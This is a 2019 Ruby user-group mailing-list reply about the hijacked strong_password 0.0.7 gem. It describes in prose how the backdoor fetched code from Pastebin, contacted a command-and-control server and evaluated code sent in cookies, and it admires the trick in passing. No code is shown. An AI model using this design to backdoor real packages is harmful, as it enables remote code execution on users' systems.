[LRUG] strong_password v0.0.7 rubygem hijacked
Edmond Lepedus
ed.lepedus at googlemail.com
Tue Jul 9 08:31:18 PDT 2019
Awesome catch — thanks for the heads-up!
Now, about that code. Isn’t it strange that they use Net::HTTP to get the code from Pastebin, but then use Faraday to call to their C&C domain. Methinks they would have done better to stick to Net::HTTP, since Faraday may not always be available. Looks almost like it was written by someone else.
Still, making it eval cookies is pretty ingenious 😈
> On 8 Jul 2019, at 18:01, Paul Makepeace <paulm at paulm.com> wrote:
>
> TL;DR: make sure you're not using strong_password 0.0.7
>
> This is a great story and debug. Yay for developers checking changes
> in upgraded gems!
>
> https://withatwist.dev/strong-password-rubygem-hijacked.html
> _______________________________________________
> Chat mailing list
> Chat at lists.lrug.org
> Archives: http://lists.lrug.org/pipermail/chat-lrug.org
> Manage your subscription: http://lists.lrug.org/options.cgi/chat-lrug.org
> List info: http://lists.lrug.org/listinfo.cgi/chat-lrug.org
More information about the Chat
mailing list